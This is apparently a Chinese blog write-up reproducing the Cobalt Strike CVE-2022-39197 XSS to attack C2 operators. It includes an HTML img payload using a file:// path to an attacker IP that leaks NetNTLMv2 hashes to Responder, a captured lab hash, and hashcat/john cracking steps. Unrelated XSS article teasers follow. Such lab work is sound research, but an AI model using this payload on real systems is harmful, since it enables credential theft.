Cobalt Strike <=4.7 xss复现和NTLM V2窃取(不会RCE)

简介: Cobalt Strike <=4.7 xss复现和NTLM V2窃取(不会RCE)

1. 说明


CVE-2022-39197这个xssrce,我只复现了xss和简单版本的NTLM哈希窃取。。。

从前几天开始,网上开始讨论关于cobalt strikeCVE-2022-39197漏洞,据说该漏洞可以直接接管服务端的权限。

前天的时候也看到了视频,但是很快这个视频就下架了。。。

于是乎在这几天,大家都在努力寻找这个漏洞的消息,但是从目前看到的来看,确实可以实现加载图片,但是更多的消息就不得而知了,至于如何rce的,这个真的不知道。

前一天看到狗狗版的cs更新了,在这里有一个细节:在user的位置存在一张残缺的图片,那这一定就是xss了。

我前几天也在尝试去复现简单的xss rce,但是由于技术有限,一直都没成功,在这里简单复现下xss吧!

其实这个上线的流程可以参考反制学习:Cobalt Strike批量上线


2. xss漏洞复现


在这里整个流程都和以前的都是一样的,我用的工具还是F12团队成员 LiAoRJ大佬的,里面稍稍做了一个非常简单的修改。

https://github.com/LiAoRJ/CS_fakesubmit


2.1 上线分析


先建立一个http的监听,再生成一个exe,然后通过checksum8算法获取文件,再解析公钥。。。具体的流程可以看下我以前的文章:Cobalt Strike批量上线

生成一个exe文件,在靶机上抓包,抓到4个地址:

其中第一个地址,主要是知道端口和ip就可以了,为了下载文件,然后计算出公钥的。

第二个地址是模拟上线需要使用的。

用第一个地址下载的文件算出公钥:

将无效的Padding去除之后,得到有效公钥,然后就可以愉快的玩耍了。


2.2 xss复现


我将上面师傅提供的代码稍微修改了下(其实不修改更好):

在这里填写我们的主机名,当前主机名为我自己在本地启动的Python服务,里面有一张图:


这个xss的位置会一直请求这个图片,如果你的图片不在的话,就会显示断裂,而且会让你的客户端非常非常卡,当又访问到图片之后,就不会再卡了。


3. 拓展


从网上看到的消息来看,这个xss还可以做很多事,比如:

  • • 获取真实ip地址
  • • 获取NTLM
  • • RCE
  • • SSRF

在这尝试下获取NTLM


4. 反制获取cs服务端的NTLM


注意:这里面可能有错误的地方,仅供参考。

原理:https://xz.aliyun.com/t/3560

https://xz.aliyun.com/t/3560
http://ashupup.love/2021/11/08/Relay%E6%94%BB%E5%87%BB/


4.1 环境准备


Windows10 提供csservercsclient

mac提供上线脚本

kali linux提供窃听ntlm 首先在windows上启动cs

当前使用的是cs4.3


4.2 cs均为windows 端窃取ntlm


本次模拟的是windows上启动客户端和服务端,都使用windows:现在server端启动cs

先连接下看下是否正常:

看下攻击机监听Responder 窃取 NTLMv2 的ip地址:

payload修改为:

payload = "<html><img src='file://192.168.135.15/netntlm'%>"

此时在windows上启动客户端连接,在mac上启动攻击脚本:

此时成功。


4.3 cs客户端为windows窃取ntlm(失败)


这个可能是我操作有问题

此时在攻击机启动cs服务端,在windows上启动客户端连接,同时在kali中进行监听,也就是说此时的kali充当了cs的服务端和Responder 窃取 NTLMv2的角色,其他的不变:

此时失败,最大的可能是我操作有问题。。。


4.4 破解hash


现在需要破解哈希值来获取明文密码。


Hashcat是执行哈希破解最快的工具,支持CPU/GPU哈希破解和多种哈希格式。Hashcat官方下载地址为:https://hashcat.net/hashcat/ 。密码词典下载地址:https://hashkiller.co.uk/downloads.aspx 。

以上来源于:https://xz.aliyun.com/t/3560

在这里将hash保存为一个txt文件,然后用命令破解:

admin::DESKTOP-7DI3BJ1:91b73d9daee0240a:6B830AAE51199AE62B0C11856EA8F5B3:0101000000000000003697DB6BCFD801DE087EA0F18B9609000000000200080059004F0057004F0001001E00570049004E002D0032003600590041004900420044004E00380049004D0004003400570049004E002D0032003600590041004900420044004E00380049004D002E0059004F0057004F002E004C004F00430041004C000300140059004F0057004F002E004C004F00430041004C000500140059004F0057004F002E004C004F00430041004C0007000800003697DB6BCFD8010600040002000000080030003000000000000000010000000020000088006DB502B9243580E663C0726CA19F40130C154E7967BD34E23D10C222DA100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E003100330035002E00310035000000000000000000

我用的是john,也可以:


5. 总结


从我自己以前的cs批量上线来看,这个需要获取stage文件或者是样本,然后获取到c2地址和公钥地址,才可以进行反制,如果说设置了云函数或者是域前置,貌似是无法直接进行反制的(笔者水平有限,可能是有洞的。)

如果是裸奔的cs,妥妥的死。

本文可能有错误的地方,写的太着急了,仅供参考!

相关文章
|
安全 Oracle 关系型数据库
宝塔漏洞 XSS窃取宝塔面板管理员漏洞 高危
宝塔是近几年刚崛起的一款服务器面板,深受各大站长的喜欢,windows2003 windows2008windosws 2012系统,linux centos deepin debian fedora系统都可以使用宝塔的面板来管理服务器,宝塔可以一键部署网站的环境,IIS环境搭建,Nginx环境,PHP环境搭建,apache jsp环境,mysql数据库,oracle数据库搭建,以及一键设置FTP账户密码,文件面板在线管理都可以很简单的利用宝塔搭建起来。
605 0
宝塔漏洞 XSS窃取宝塔面板管理员漏洞 高危
|
存储 安全 测试技术
宝塔漏洞 XSS窃取宝塔面板管理员漏洞高危
宝塔是近几年刚崛起的一款服务器面板,深受各大站长的喜欢,windows2003 windows2008windosws 2012系统,linux centos deepin debian fedora系统都可以使用宝塔的面板来管理服务器,宝塔可以一键部署网站的环境,IIS环境搭建,Nginx环境,PHP环境搭建,apache jsp环境,mysql数据库,oracle数据库搭建,以及一键设置FTP账户密码,文件面板在线管理都可以很简单的利用宝塔搭建起来。
3771 0
|
监控 JavaScript 安全
XSS攻击之窃取Cookie
译者按: 10 年前的博客似乎有点老了,但是XSS 攻击的威胁依然还在,我们不得不防。 原文: XSS - Stealing Cookies 101 译者: Fundebug 本文采用意译,版权归原作者所有 窃取Cookie是非常简单的,因此不要轻易相信客户端所声明的身份。
1313 0
|
4月前
|
存储 安全 JavaScript
手摸手带你进行XSS攻击与防御
当谈到网络安全和信息安全时,跨站脚本攻击(XSS)是一个不可忽视的威胁。现在大家使用邮箱进行用户认证比较多,如果黑客利用XSS攻陷了用户的邮箱,拿到了cookie那么就可以冒充你进行收发邮件,那真就太可怕了,通过邮箱验证进行其他各种网站的登录与高危操作。 那么今天,本文将带大家深入了解XSS攻击与对应的防御措施。
|
4天前
|
安全 前端开发 Java
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第26天】Web安全是现代软件开发的重要领域,本文深入探讨了XSS和CSRF两种常见攻击的原理及防御策略。针对XSS,介绍了输入验证与转义、使用CSP、WAF、HTTP-only Cookie和代码审查等方法。对于CSRF,提出了启用CSRF保护、设置CSRF Token、使用HTTPS、二次验证和用户教育等措施。通过这些策略,开发者可以构建更安全的Web应用。
24 4
|
3天前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
19 2
|
5天前
|
存储 安全 Go
Web安全基础:防范XSS与CSRF攻击的方法
【10月更文挑战第25天】Web安全是互联网应用开发中的重要环节。本文通过具体案例分析了跨站脚本攻击(XSS)和跨站请求伪造(CSRF)的原理及防范方法,包括服务器端数据过滤、使用Content Security Policy (CSP)、添加CSRF令牌等措施,帮助开发者构建更安全的Web应用。
29 3
|
2月前
|
存储 安全 JavaScript
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
这篇文章详细解释了XSS跨站脚本攻击的概念、原理、特点、类型,并提供了攻击方式和防御方法。
166 1
|
1月前
|
存储 JavaScript 安全
|
1月前
|
存储 JavaScript 前端开发
Xss跨站脚本攻击(Cross Site Script)
Xss跨站脚本攻击(Cross Site Script)